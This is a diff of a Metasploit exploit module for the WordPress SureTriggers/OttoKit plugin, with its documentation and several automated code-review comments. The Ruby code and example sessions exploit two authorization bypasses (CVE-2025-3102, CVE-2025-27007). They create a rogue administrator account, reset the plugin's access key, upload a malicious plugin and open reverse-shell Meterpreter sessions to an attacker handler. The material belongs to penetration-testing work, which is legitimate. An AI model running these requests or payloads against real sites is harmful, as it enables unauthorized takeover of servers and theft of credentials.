diff --git a/documentation/modules/exploit/multi/http/wp_suretriggers_auth_bypass.md b/documentation/modules/exploit/multi/http/wp_suretriggers_auth_bypass.md index da26266937f8..4f011b53acc7 100644 --- a/documentation/modules/exploit/multi/http/wp_suretriggers_auth_bypass.md +++ b/documentation/modules/exploit/multi/http/wp_suretriggers_auth_bypass.md 
@@ -1,17 +1,28 @@ ## Vulnerable Application -This Metasploit module exploits an administrative user creation vulnerability in the -WordPress SureTriggers plugin, versions <= 1.0.78 (CVE-2025-3102). -The plugin exposes an unauthenticated REST endpoint (`automation/action`) that allows -bypassing permission checks to create a new administrator account. +This Metasploit module exploits administrative user creation vulnerabilities in the +WordPress SureTriggers/OttoKit plugin: -To replicate a vulnerable environment for testing: +* **CVE-2025-3102** (≤ 1.0.78): unauthenticated admin creation via the `automation/action` +REST endpoint with an empty `St-Authorization: Bearer ` header. +* **CVE-2025-27007** (≤ 1.0.82): unauthenticated reset of the access key via the `connection/create-wp-connection` endpoint, +followed by admin creation using `St-Authorization: Bearer `. -1. Install WordPress using the provided Docker Compose configuration. -2. Download and install the SureTriggers plugin v1.0.78: - [https://downloads.wordpress.org/plugin/suretriggers.1.0.78.zip](https://downloads.wordpress.org/plugin/suretriggers.1.0.78.zip) -3. Verify that the plugin is activated and accessible on the local network. -4. No further configuration is required; vulnerability is present immediately upon activation. +### To replicate vulnerable environments + +1. **SureTriggers v1.0.78 (CVE-2025-3102)** + + * Download & install plugin v1.0.78: + `https://downloads.wordpress.org/plugin/suretriggers.1.0.78.zip` + * No additional setup is required; the bypass works immediately upon activation. + +2. **SureTriggers v1.0.82 (CVE-2025-27007)** + + * Download & install plugin v1.0.82: + `https://downloads.wordpress.org/plugin/suretriggers.1.0.82.zip` + * No secret key is needed; the exploit will reset it to the specified value. + +Both scenarios can be deployed via Docker Compose. ## Docker Compose Configuration 
@@ -62,131 +73,168 @@ post_max_size = 64M ```bash docker-compose up -d ``` - -2. Complete WordPress setup at [http://localhost:5555](http://localhost:5555) -3. Confirm that SureTriggers v1.0.78 is active under **Plugins** -4. Launch `msfconsole` -5. Load the module: +2. Complete WordPress setup at [http://localhost:5555](http://localhost:5555). +3. Confirm the targeted SureTriggers version is active under **Plugins**. +4. In `msfconsole`: ```bash use exploit/multi/http/wp_suretriggers_auth_bypass -``` - -6. Set `RHOSTS` to the target IP -7. Optionally set `ST_AUTH` if you have an existing key -8. Configure `WP_USER`, `WP_PASS`, `WP_EMAIL` -9. Execute the exploit with `run` - -## Options - -* **RHOSTS**: Target IP address or hostname where WordPress is running. -* **TARGETURI**: Base path to the WordPress installation (default is `/`). -* **WP_USER**, **WP_PASS**, **WP_EMAIL**: Credentials for the new administrator account that the exploit will create. - By default these are randomly generated but you can set them to values of your choice, for example: - -```bash +set RHOSTS 127.0.0.1 +set TARGETURI / set WP_USER eviladmin set WP_PASS Str0ngP@ss! set WP_EMAIL eviladmin@example.com ``` -* **ST_AUTH**: *(Optional)* If you have the plugin’s secret key (used in the `st_authorization` header), - you can provide it here to authenticate the REST request. - If left empty the module will send an empty header value, which still works on versions <= 1.0.78. - -## Scenarios +## Options -### Successful Exploitation Against SureTriggers v1.0.78 +* **WP_USER**, **WP_PASS**, **WP_EMAIL**: New administrator credentials (random by default). +* **ST_AUTH**: *(Optional)* Value for `St-Authorization` header (used by CVE-2025-3102; default empty). +* **ACCESS_KEY**: *(Optional)* Key to reset for CVE-2025-27007 (random by default). 
+* **ACTION**: Exploit to perform: -**Setup:** + * `CVE-2025-3102` + * `CVE-2025-27007` -* Local WordPress instance with SureTriggers v1.0.78 -* Metasploit Framework +## Scenarios -**Steps:** +### CVE-2025-3102: Empty Bearer Admin Creation -1. Start `msfconsole` +1. Ensure SureTriggers v1.0.78 is active. +2. In `msfconsole`, set: -2. Load the module: ```bash -use exploit/multi/http/wp_suretriggers_auth_bypass +set ACTION CVE-2025-3102 ``` -3. Configure: +3. Run the module: it will send an empty `St-Authorization: Bearer ` header to `/wp-json/sure-triggers/v1/automation/action`. +4. New administrator is created; payload is uploaded and executed. + +### CVE-2025-27007: Reset Access Key & Admin Creation + +1. Ensure SureTriggers v1.0.82 is active. +2. In `msfconsole`, set: + ```bash -set RHOSTS 127.0.0.1 -set TARGETURI / -set WP_USER eviladmin -set WP_PASS Str0ngP@ss! -run +set ACTION CVE-2025-27007 ``` +3. Run the module: it will call `/wp-json/sure-triggers/v1/connection/create-wp-connection` to reset the key, then use + `St-Authorization: Bearer mynewkey123` against `/wp-json/sure-triggers/v1/automation/action`. +4. New administrator is created; payload is uploaded and executed. -**Expected Results**: + +### Expected Results (CVE-2025-3102) With `php/meterpreter/reverse_tcp`: ```plaintext -msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > run http://127.0.0.1:5555 +msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > run http://lab:5555 [*] Started reverse TCP handler on 192.168.1.36:4444 [*] Running automatic check ("set AutoCheck false" to disable) -[*] Detected WordPress version: 6.3.2 -[+] Detected suretriggers plugin version: 1.0.78 -[+] The target appears to be vulnerable. -[*] Attempting to create administrator user via auth bypass... -[!] Primary endpoint failed or did not return success, trying fallback via rest_route... 
-[+] Administrator created: sol_bash:k9R0ZwjRX5VBOBJ +[*] Detected WordPress version: 6.8.1 +[+] The target appears to be vulnerable. Detected suretriggers version 1.0.78 (vulnerable to CVE-2025-3102) +[*] CVE-2025-3102: creating admin via St-Authorization Bearer (empty) +[+] Admin created: zGrsYO:8XL0pZKjN7pc [*] Uploading malicious plugin for code execution... -[*] Executing payload at /wp-content/plugins/wp_p2ash/ajax_efdsa.php... -[*] Sending stage (40004 bytes) to 172.27.0.2 -[+] Deleted ajax_efdsa.php -[+] Deleted wp_p2ash.php -[+] Deleted ../wp_p2ash -[*] Meterpreter session 3 opened (192.168.1.36:4444 -> 172.27.0.2:33924) at 2025-05-07 17:22:49 +0200 +[*] Executing payload at /wp-content/plugins/wp_63rkh/ajax_fybgc.php... +[*] Sending stage (40004 bytes) to 172.27.0.3 +[+] Deleted ajax_fybgc.php +[+] Deleted wp_63rkh.php +[+] Deleted ../wp_63rkh +[*] Meterpreter session 1 opened (192.168.1.36:4444 -> 172.27.0.3:51410) at 2025-05-14 19:00:30 +0200 meterpreter > sysinfo -Computer : a6e792b1c252 -OS : Linux a6e792b1c252 6.14.2-2-cachyos #1 SMP PREEMPT_DYNAMIC Thu, 10 Apr 2025 17:27:10 +0000 x86_64 +Computer : 396e678f2510 +OS : Linux 396e678f2510 6.14.2-2-cachyos #1 SMP PREEMPT_DYNAMIC Thu, 10 Apr 2025 17:27:10 +0000 x86_64 Meterpreter : php/linux ``` With `cmd/linux/http/x64/meterpreter/reverse_tcp`: ```plaintext -msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > show targets +msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > set target 1 +target => 1 +msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp +payload => cmd/linux/http/x64/meterpreter/reverse_tcp +msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > run http://lab:5555 +[*] Started reverse TCP handler on 192.168.1.36:4444 +[*] Running automatic check ("set AutoCheck false" to disable) +[*] Detected WordPress version: 6.8.1 +[+] The target appears to be vulnerable. 
Detected suretriggers version 1.0.78 (vulnerable to CVE-2025-3102) +[*] CVE-2025-3102: creating admin via St-Authorization Bearer (empty) +[+] Admin created: zGrsYO:8XL0pZKjN7pc +[*] Uploading malicious plugin for code execution... +[*] Executing payload at /wp-content/plugins/wp_exf15/ajax_tpfd9.php... +[*] Sending stage (3045380 bytes) to 172.27.0.3 +[+] Deleted ajax_tpfd9.php +[+] Deleted wp_exf15.php +[+] Deleted ../wp_exf15 +[*] Meterpreter session 2 opened (192.168.1.36:4444 -> 172.27.0.3:53324) at 2025-05-14 19:02:06 +0200 + +meterpreter > sysinfo +Computer : 172.27.0.3 +OS : Debian 12.10 (Linux 6.14.2-2-cachyos) +Architecture : x64 +BuildTuple : x86_64-linux-musl +Meterpreter : x64/linux +``` -Exploit targets: -================= +### Expected Results (CVE-2025-27007) - Id Name - -- ---- -=> 0 PHP In-Memory - 1 Unix In-Memory - 2 Windows In-Memory +With `php/meterpreter/reverse_tcp`: +```plaintext +msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > set action CVE-2025-27007 +action => CVE-2025-27007 +msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > run http://lab:5555 +[*] Started reverse TCP handler on 192.168.1.36:4444 +[*] Running automatic check ("set AutoCheck false" to disable) +[*] Detected WordPress version: 6.8.1 +[+] The target appears to be vulnerable. Detected suretriggers version 1.0.82 (vulnerable to CVE-2025-27007) +[*] CVE-2025-27007: reset access key & create admin +[*] Resetting access key +[+] Access key reset successful +[+] Admin created: pAEaR3:98TCYzILsdXt +[*] Uploading malicious plugin for code execution... +[*] Executing payload at /wp-content/plugins/wp_14slj/ajax_drh8b.php... 
+[*] Sending stage (40004 bytes) to 172.27.0.3 +[+] Deleted ajax_drh8b.php +[+] Deleted wp_14slj.php +[+] Deleted ../wp_14slj +[*] Meterpreter session 1 opened (192.168.1.36:4444 -> 172.27.0.3:42464) at 2025-05-14 19:05:06 +0200 +meterpreter > sysinfo +Computer : 396e678f2510 +OS : Linux 396e678f2510 6.14.2-2-cachyos #1 SMP PREEMPT_DYNAMIC Thu, 10 Apr 2025 17:27:10 +0000 x86_64 +Meterpreter : php/linux +``` + +With `cmd/linux/http/x64/meterpreter/reverse_tcp`: + +```plaintext msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > set target 1 target => 1 msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp payload => cmd/linux/http/x64/meterpreter/reverse_tcp -msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > run http://127.0.0.1:5555 +msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > run http://lab:5555 [*] Started reverse TCP handler on 192.168.1.36:4444 [*] Running automatic check ("set AutoCheck false" to disable) -[*] Detected WordPress version: 6.3.2 -[+] Detected suretriggers plugin version: 1.0.78 -[+] The target appears to be vulnerable. -[*] Attempting to create administrator user via auth bypass... -[!] Primary endpoint failed or did not return success, trying fallback via rest_route... -[+] Administrator created: sol_bash:k9R0ZwjRX5VBOBJ +[*] Detected WordPress version: 6.8.1 +[+] The target appears to be vulnerable. Detected suretriggers version 1.0.82 (vulnerable to CVE-2025-27007) +[*] CVE-2025-27007: reset access key & create admin +[*] Resetting access key +[+] Access key reset successful +[+] Admin created: pAEaR3:98TCYzILsdXt [*] Uploading malicious plugin for code execution... -[*] Executing payload at /wp-content/plugins/wp_ppqii/ajax_cqc8l.php... 
-[*] Sending stage (3045380 bytes) to 172.27.0.2 -[+] Deleted ajax_cqc8l.php -[+] Deleted wp_ppqii.php -[+] Deleted ../wp_ppqii -[*] Meterpreter session 4 opened (192.168.1.36:4444 -> 172.27.0.2:54238) at 2025-05-07 17:24:10 +0200 +[*] Executing payload at /wp-content/plugins/wp_c7ziw/ajax_a9arm.php... +[*] Sending stage (3045380 bytes) to 172.27.0.3 +[+] Deleted ajax_a9arm.php +[+] Deleted wp_c7ziw.php +[+] Deleted ../wp_c7ziw +[*] Meterpreter session 2 opened (192.168.1.36:4444 -> 172.27.0.3:54362) at 2025-05-14 19:06:04 +0200 meterpreter > sysinfo -Computer : 172.27.0.2 -OS : Debian 11.8 (Linux 6.14.2-2-cachyos) +Computer : 172.27.0.3 +OS : Debian 12.10 (Linux 6.14.2-2-cachyos) Architecture : x64 BuildTuple : x86_64-linux-musl Meterpreter : x64/linux diff --git a/modules/exploits/multi/http/wp_suretriggers_auth_bypass.rb b/modules/exploits/multi/http/wp_suretriggers_auth_bypass.rb index ace3519847f8..af4f4c6d51ae 100644 --- a/modules/exploits/multi/http/wp_suretriggers_auth_bypass.rb +++ b/modules/exploits/multi/http/wp_suretriggers_auth_bypass.rb 
@@ -17,21 +17,25 @@ def initialize(info = {}) super( update_info( info, - 'Name' => 'WordPress SureTriggers Auth Bypass and RCE', + 'Name' => 'WordPress SureTriggers/OttoKit Combined Auth Bypass (CVE-2025-3102, CVE-2025-27007)', 'Description' => %q{ - This module exploits an authorization bypass in the WordPress SureTriggers plugin (<= 1.0.78). - It first creates a new administrator account via the unauthenticated REST endpoint, - then uploads and executes a PHP payload using FileDropper for remote code execution. + Exploits two distinct authorization bypasses in SureTriggers/OttoKit plugin: + - CVE-2025-3102: admin creation via St-Authorization Bearer (empty) + - CVE-2025-27007: reset access key via connection endpoint & admin creation with Bearer header }, 'Author' => [ - 'Michael Mazzolini (mikemyers)', # Vulnerability Discovery - 'Khaled Alenazi (Nxploited)', # PoC - 'Valentin Lobstein' # Metasploit module + 'Michael Mazzolini (mikemyers)', # Vulnerability discovery (CVE-2025-3102) + 'Denver Jackson', # Vulnerability discovery (CVE-2025-27007) + 'Khaled Alenazi (Nxploited)', # PoC (CVE-2025-3102) + 'Valentin Lobstein', # Metasploit module ], 'References' => [ ['CVE', '2025-3102'], + ['CVE', '2025-27007'], ['URL', 'https://github.com/Nxploited/CVE-2025-3102'], - ['URL', 'https://www.wordfence.com/blog/2025/04/100000-wordpress-sites-affected-by-administrative-user-creation-vulnerability-in-suretriggers-wordpress-plugin/'] + ['URL', 'https://www.wordfence.com/blog/2025/04/100000-wordpress-sites-affected-by-administrative-user-creation-vulnerability-in-suretriggers-wordpress-plugin/'], + ['URL', 'https://patchstack.com/articles/additional-critical-ottokit-formerly-suretriggers-vulnerability-patched?_s_id=cve'], + ['URL', 'https://cloud.projectdiscovery.io/library/CVE-2025-27007'] ], 'License' => MSF_LICENSE, 'Privileged' => false, 
@@ -70,14 +74,15 @@ def initialize(info = {}) 'Reliability' => [REPEATABLE_SESSION] } ) - ) + ) register_options( [ OptString.new('WP_USER', [true, 'Username for the new administrator', Faker::Internet.username(specifier: 5..8)]), OptString.new('WP_PASS', [true, 'Password for the new administrator', Faker::Internet.password(min_length: 12)]), OptString.new('WP_EMAIL', [true, 'Email for the new administrator', Faker::Internet.email(name: Faker::Internet.username(specifier: 5..8))]), - OptString.new('ST_AUTH', [false, 'Value for st_authorization header', '']) + OptString.new('ST_AUTH', [false, 'St-Authorization header', Rex::Text.rand_text_alphanumeric(16)]), + OptString.new('ACTION', [true, 'Action to perform (CVE-2025-3102 or CVE-2025-27007)', 'CVE-2025-3102']), ] ) end 
@@ -89,54 +94,146 @@ def check print_status("Detected WordPress version: #{wp_version}") if wp_version plugin = 'suretriggers' - readme = check_plugin_version_from_readme(plugin, '1.0.79', '0.0.1') - detected = readme&.details&.dig(:version) - - if detected.nil? + readme = check_plugin_version_from_readme(plugin, '1.0.82') + version = readme&.details&.dig(:version) + unless version return CheckCode::Unknown("Unable to determine the #{plugin} plugin version.") end - detected_version = Rex::Version.new(detected) - - if detected_version <= Rex::Version.new('1.0.78') - return CheckCode::Appears("Detected #{plugin} version #{detected_version}") + detected = Rex::Version.new(version) + if detected <= Rex::Version.new('1.0.78') + return CheckCode::Appears("Detected #{plugin} version #{detected} (vulnerable to CVE-2025-3102)") + elsif detected <= Rex::Version.new('1.0.82') + return CheckCode::Appears("Detected #{plugin} version #{detected} (vulnerable to CVE-2025-27007)") + else + return CheckCode::Safe("Detected #{plugin} version #{detected} (appears patched)") end - - CheckCode::Safe("#{plugin} #{detected_version} >= 1.0.79 appears patched") end def exploit - print_status('Attempting to create administrator user via auth bypass...') + action = datastore['ACTION'].to_s.upcase + case action + when 'CVE-2025-3102' + exploit_cve3102 + when 'CVE-2025-27007' + exploit_cve27007 + else + fail_with(Failure::BadConfig, "Unknown action: #{datastore['ACTION']}") + end + end - create_uri = normalize_uri(target_uri.path, 'wp-json', 'sure-triggers', 'v1', 'automation', 'action') - headers = { 'st_authorization' => datastore['ST_AUTH'] } - payload = user_payload.to_json + def exploit_cve3102 + print_status('CVE-2025-3102: creating admin via St-Authorization Bearer (empty)') + uri = normalize_uri(target_uri.path, 'wp-json', 'sure-triggers', 'v1', 'automation', 'action') + headers = { 'St-Authorization' => 'Bearer ' } res = send_request_cgi( 'method' => 'POST', - 'uri' => create_uri, + 
'uri' => uri, 'ctype' => 'application/json', - 'data' => payload, + 'data' => user_payload.to_json, 'headers' => headers ) + unless res&.code == 200 && res.get_json_document&.dig('success') + vprint_warning('Primary endpoint failed, trying fallback via rest_route...') + res = send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path), + 'vars_get' => { 'rest_route' => '/sure-triggers/v1/automation/action' }, + 'ctype' => 'application/json', + 'data' => user_payload.to_json, + 'headers' => headers + ) + end + fail_with(Failure::UnexpectedReply, 'CVE-2025-3102: user creation failed') unless res&.code == 200 && res.get_json_document&.dig('success') + + finalize_admin + cookie = wordpress_login(datastore['WP_USER'], datastore['WP_PASS']) + upload_and_execute_payload(cookie) + end + + def exploit_cve27007 + print_status('CVE-2025-27007: reset access key & create admin') + reset_access_key + + uri = normalize_uri(target_uri.path, 'wp-json', 'sure-triggers', 'v1', 'automation', 'action') + headers = { 'St-Authorization' => "Bearer #{datastore['ST_AUTH']}" } + res = send_request_cgi( + 'method' => 'POST', + 'uri' => uri, + 'ctype' => 'application/json', + 'data' => user_payload.to_json, + 'headers' => headers + ) unless res&.code == 200 && res.get_json_document&.dig('success') - print_warning('Primary endpoint failed, trying fallback via rest_route...') + vprint_warning('Primary endpoint failed, trying fallback via rest_route...') res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path), 'vars_get' => { 'rest_route' => '/sure-triggers/v1/automation/action' }, 'ctype' => 'application/json', - 'data' => payload, + 'data' => user_payload.to_json, 'headers' => headers ) end + fail_with(Failure::UnexpectedReply, 'CVE-2025-27007: user creation failed') unless res&.code == 200 && res.get_json_document&.dig('success') + finalize_admin + cookie = wordpress_login(datastore['WP_USER'], datastore['WP_PASS']) + 
upload_and_execute_payload(cookie) + end + + def reset_access_key + print_status('Resetting access key') + uri = normalize_uri(target_uri.path, 'wp-json', 'sure-triggers', 'v1', 'connection', 'create-wp-connection') + body = { + 'sure-triggers-access-key' => datastore['ST_AUTH'], + 'wp-password' => datastore['WP_PASS'], + 'connection_status' => 'ok', + 'wp-username' => datastore['WP_USER'], + 'connected_email' => datastore['WP_EMAIL'] + }.to_json + + res = send_request_cgi( + 'method' => 'POST', + 'uri' => uri, + 'ctype' => 'application/json', + 'data' => body, + 'headers' => { 'User-Agent' => 'OttoKit' } + ) unless res&.code == 200 && res.get_json_document&.dig('success') - fail_with(Failure::UnexpectedReply, 'User creation did not return success') + vprint_warning('Primary endpoint failed, trying fallback via rest_route...') + res = send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path), + 'vars_get' => { 'rest_route' => '/sure-triggers/v1/connection/create-wp-connection' }, + 'ctype' => 'application/json', + 'data' => body, + 'headers' => { 'User-Agent' => 'OttoKit' } + ) end + fail_with(Failure::UnexpectedReply, 'Key reset failed') unless res&.code == 200 && res.get_json_document&.dig('success') + print_good('Access key reset successful') + end + + def user_payload + { + 'integration' => 'WordPress', + 'type_event' => 'create_user_if_not_exists', + 'selected_options' => { + 'user_name' => datastore['WP_USER'], + 'password' => datastore['WP_PASS'], + 'user_email' => datastore['WP_EMAIL'], + 'role' => 'administrator' + }, + 'fields' => [], + 'context' => {} + } + end - print_good("Administrator created: #{datastore['WP_USER']}:#{datastore['WP_PASS']}") + def finalize_admin + print_good("Admin created: #{datastore['WP_USER']}:#{datastore['WP_PASS']}") create_credential( workspace_id: myworkspace_id, 
@@ -151,7 +248,6 @@ def exploit protocol: 'tcp', status: Metasploit::Model::Login::Status::UNTRIED ) - vprint_good("Credential for user '#{datastore['WP_USER']}' stored successfully.") loot_data = "Username: #{datastore['WP_USER']}, Password: #{datastore['WP_PASS']}\n" @@ -179,28 +275,10 @@ def exploit host: datastore['RHOST'], port: datastore['RPORT'], proto: 'tcp', - name: 'SureTriggers WordPress Plugin Auth Bypass', + name: 'SureTriggers Auth Bypass', refs: references, - info: 'Unauthenticated admin creation via vulnerable REST API endpoint' + info: 'Unauthenticated admin creation via SureTriggers plugin' ) - - cookie = wordpress_login(datastore['WP_USER'], datastore['WP_PASS']) - upload_and_execute_payload(cookie) - end - - def user_payload - { - 'integration' => 'WordPress', - 'type_event' => 'create_user_if_not_exists', - 'selected_options' => { - 'user_name' => datastore['WP_USER'], - 'password' => datastore['WP_PASS'], - 'user_email' => datastore['WP_EMAIL'], - 'role' => 'administrator' - }, - 'fields' => [], - 'context' => {} - } end def upload_and_execute_payload(auth_cookie)
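Review bot: In the first documentation hunk (`## Vulnerable Application`), the CVE-2025-27007 bullet ends with "admin creation using `St-Authorization: Bearer `", with nothing after `Bearer`. That reads the same as the empty-header case in the CVE-2025-3102 bullet just above it. If a placeholder for the newly set key was intended there, write it so that it survives rendering, and say that the value is the key set through `connection/create-wp-connection`.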
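Review bot: The rewritten `## Options` list in the second documentation hunk does not match the options the module registers in this same patch. It documents an `ACCESS_KEY` option, but `register_options` adds only `ST_AUTH` and `ACTION`, and `reset_access_key` takes the key from `datastore['ST_AUTH']`. It also describes `ST_AUTH` as "used by CVE-2025-3102; default empty", while the new default is `Rex::Text.rand_text_alphanumeric(16)` and `exploit_cve3102` sends a hard-coded `'Bearer '` without reading the option. Scenario step 3 for CVE-2025-27007 mentions `Bearer mynewkey123`, but no step sets that value. Please align the option names, defaults and the example with the code, and consider keeping the `RHOSTS` and `TARGETURI` entries that this hunk drops.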
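Review bot: The new `'Description'` in the metadata hunk of `wp_suretriggers_auth_bypass.rb` no longer says that the module uploads and executes a PHP payload after creating the administrator, and the affected version bounds are gone too, although both exploit paths still end in `upload_and_execute_payload(cookie)`. Anyone reading the module info should be told that it writes a plugin to the target and for which plugin versions each CVE applies, so please restore a sentence for each. Minor: the Patchstack reference carries a `?_s_id=cve` query string that can be dropped.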
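Review bot: In the `register_options` hunk, `ACTION` is a free-form `OptString`, so a mistyped value is only caught by the `else` branch of `exploit` via `fail_with(Failure::BadConfig, ...)`, after `check` has already sent requests to the target. An `OptEnum` restricted to `CVE-2025-3102` and `CVE-2025-27007` would reject bad input at option validation and make the `.to_s.upcase` normalisation unnecessary. The help text for `ST_AUTH` ('St-Authorization header') should also say that it is the access key written by the CVE-2025-27007 path, since that is the only place the code reads it.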
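Review bot: `check` in the `@@ -89,54 +94,146 @@` hunk maps the detected version to exactly one CVE and never consults `datastore['ACTION']`, so its result can disagree with what `exploit` will actually attempt. With the default `ACTION` of `CVE-2025-3102`, a 1.0.82 install returns `CheckCode::Appears` and then fails at user creation. A 1.0.78 install is reported only as CVE-2025-3102, although the documentation in this patch lists CVE-2025-27007 as affecting ≤ 1.0.82. Suggest comparing the version against the bound for the selected action and naming every CVE that applies in the message. Also confirm the second argument of `check_plugin_version_from_readme(plugin, '1.0.82')`: the removed call passed `'1.0.79'`, which the removed message treated as the first patched release, whereas 1.0.82 is handled here as still vulnerable. Separately, `exploit_cve3102` and `exploit_cve27007` repeat the same request, fallback and failure check and differ only in the header value, which would be easier to review as one helper.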
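Review bot: In the last hunk, the vulnerability record is made less specific (`name: 'SureTriggers Auth Bypass'`, `info: 'Unauthenticated admin creation via SureTriggers plugin'`) just as the module starts covering two CVEs, and `refs: references` attaches both CVEs regardless of which path ran. Whoever reads the workspace report afterwards cannot tell which issue was confirmed on the host. Suggest including the selected action in `name` or `info` and limiting `refs` to the references for that CVE.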